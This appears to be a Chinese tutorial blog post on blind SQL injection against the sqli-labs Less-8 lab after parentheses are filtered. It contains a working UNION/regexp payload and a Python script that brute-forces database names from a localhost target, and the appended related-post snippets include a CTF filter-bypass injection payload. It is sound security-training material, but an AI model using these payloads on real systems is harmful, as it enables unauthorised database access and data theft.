Python学习之绕过小括号过滤后的盲注

0x00   环境搭建

sqli-labs第八关,简单修改下源代码,加入下面一行代码

$id=preg_replace(‘/\(|\)/‘, "",$id);  //过滤小括号

0x01   脚本编写

1、构造payload

‘ union select 1,2,3 from information_schema.tables where table_schema regexp binary ‘^%s.*$‘ -- -

2、脚本如下

#coding=utf-8

import urllib

url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"#测试payload
payload = "‘ and 1=2 union select 1,2,3 from information_schema.tables where table_schema regexp binary ‘^%s.*$‘-- -"
#简单测试字典,这里可以借助string.printable
list=‘abcdefghijklmnopqrstuvwxyz‘
#递归暴库
def check(str):
    for ch in list:
        payloads=payload % (str+ch)
        if check1(payloads):
            print str+ch
            check(str+ch)
#判断正则匹配结果是否正确
def check1(str1):
    resp=urllib.urlopen(url % str1).read()
    if "You are in" in resp:
        return True
    else:
        return False

if __name__ == "__main__":
    check("")

脚本执行部分结果

原文地址:https://www.cnblogs.com/peterpan0707007/p/8719667.html

时间: 2024-11-09 03:04:24

Python学习之绕过小括号过滤后的盲注的相关文章

python:元组和小括号的误导

书上说元组就是被包含在小括号里面,不能被修改.列表是包含在中括号里面,可以被修改. 列表中可以嵌套列表,元组中可以嵌套元组,一般没人混用,这点测试无误: >>> aa[0] (12, 34) >>> aa[0]=(1,2) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: 'tuple' object does n

python中元组与小括号的关系

在学习Python 的时候.说到有两种数据类型,一种叫 列表,一种叫做元组,可以认为,元组是功能精简的列表.因为它少了列表很多功能.但是又有相识.定义他们的时候,主要是用中括号和小括号之分. 例如:定义一个列表: mylist=["one","two","3333"] 定义一个元组: myzu=("one","two") 大概就这么回事.所以大家也很容易认为元组就是小括号括起来的元素(我之前也这么认为).

Python 学习笔记 - 作用域小知识

Python的作用域和其他语言有所不同,他有几个小窍门来判断作用域. 1. Python里面没有块级别的作用域:只有函数级别的作用域. 比如说,下面这个例子,如果是Java或者其他语言,肯定报错name没有定义.Python里面因为不存在块级别的作用域,因此name直接就输出9了 >>> for i in range(10):     name=i print(name) ---------- 9 2. 作用域链的顺序是从内往外找,直到找不到为止 例如 >>> def 

python学习之jquery小练习

<html> <head> <title>html/css/js学习小结</title> <script src="jquery-1.8.3.js"></script> <style type="text/css"> /*span { display:inline; width:16%; }*/ li { display:table-cell; width:0.5%; margin-

python学习之----异常处理小示例

网络是十分复杂的.网页数据格式不友好,网站服务器宕机,目标数据的标签找不到,都 是很麻烦的事情.网络数据采集最痛苦的遭遇之一,就是爬虫运行的时候你洗洗睡了,梦 想着明天一早数据就都会采集好放在数据库里,结果第二天醒来,你看到的却是一个因某 种数据格式异常导致运行错误的爬虫,在前一天当你不再盯着屏幕去睡觉之后,没过一会 儿爬虫就不再运行了.那个时候,你可能想骂发明互联网(以及那些奇葩的网络数据格 式)的人,但是你真正应该斥责的人是你自己,为什么一开始不估计可能会出现的异常! html = urlo

python学习之----BeautifulSoup小示例

BeautifulSoup 库最常用的对象恰好就是BeautifulSoup 对象. from urllib.request import urlopen from bs4 import BeautifulSoup html = urlopen("http://www.pythonscraping.com/pages/page1.html") bsObj = BeautifulSoup(html.read()) print(bsObj.h1) bsObj.tagname只能获取页面中的

实验吧——认真一点(绕过空格,逗号,关键字过滤等 sql盲注)

题目地址:http://ctf5.shiyanbar.com/web/earnest/index.php 过滤和拦截了某些东西,我经过多次尝试,最终构造的是 1'=(ascii(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))from(1)))>1)='1 其中过滤了一次or,所以information里的or要双写,substr中有逗号,所以

过滤union 进行盲注

http://www.x.com/sections_intr.php?id=181 and length((database()))=4 http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122 http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),2,1))=122 http://www.

零基础Python学习路线,小白的进阶之路!

近几年Python的受欢迎程度可谓是扶摇直上,当然了学习的人也是愈来愈多.一些学习Python的小白在学习初期,总希望能够得到一份Python学习路线图,小编经过多方汇总为大家汇总了一份Python学习路线图.对于一个零基础的想学习python的朋友来说,学习方法很重要, 学习方法不对努力白费 一定要有一个正确的学习线路与方法零基础Python学习路线,小白的进阶之路!零基础Python学习路线,小白的进阶之路!必学知识:[Linux基础][Python基础语法][Python字符串][文件操作